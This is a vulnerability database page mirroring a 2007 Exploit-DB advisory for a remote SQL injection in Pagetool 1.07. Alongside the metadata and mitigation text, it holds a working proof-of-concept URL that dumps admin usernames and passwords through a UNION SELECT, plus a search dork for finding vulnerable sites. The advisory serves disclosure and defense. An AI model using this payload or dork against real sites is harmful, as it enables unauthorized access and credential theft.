header-logo
Suggest Exploit
vendor:
Pagetool
by:
Katatafish
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Pagetool
Affected Version From: 01.07
Affected Version To: 01.07
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

pagetool-1.07 Remote SQL Injection

The pagetool-1.07 version is vulnerable to a remote SQL injection. This can be exploited by an attacker by sending a specially crafted request to the index.php file with a malicious payload in the 'name' parameter. This allows the attacker to retrieve sensitive information from the database.

Mitigation:

Update to a patched version of Pagetool or use a different software solution that is not vulnerable to SQL injection.
Source

Exploit-DB raw data:

###pagetool-1.07 Remote SQL Injection###
#
#download:http://kent.dl.sourceforge.net/sourceforge/pagetool/pagetool-1.07.tar.gz
#
#Found by: Katatafish (karatatata@hush.com)
#
#Dork: "powered by Pagetool"
#
#Thanks: str0ke
#
########################################

#PoC
http://www.site.com/[path]/index.php?name=pagetool_news&news_id=-1/**/union/**/all/**/select/**/null,/**/null,/**/CONCAT(0x557365726E346D653A20,/**/username),/**/CONCAT(0x50617373773072643A20,/**/passwd),/**/null/**/from/**/pt_core_users/**/where/**/user_id=1

# milw0rm.com [2007-06-25]

Navigation

Suggest Exploit

Services By CQR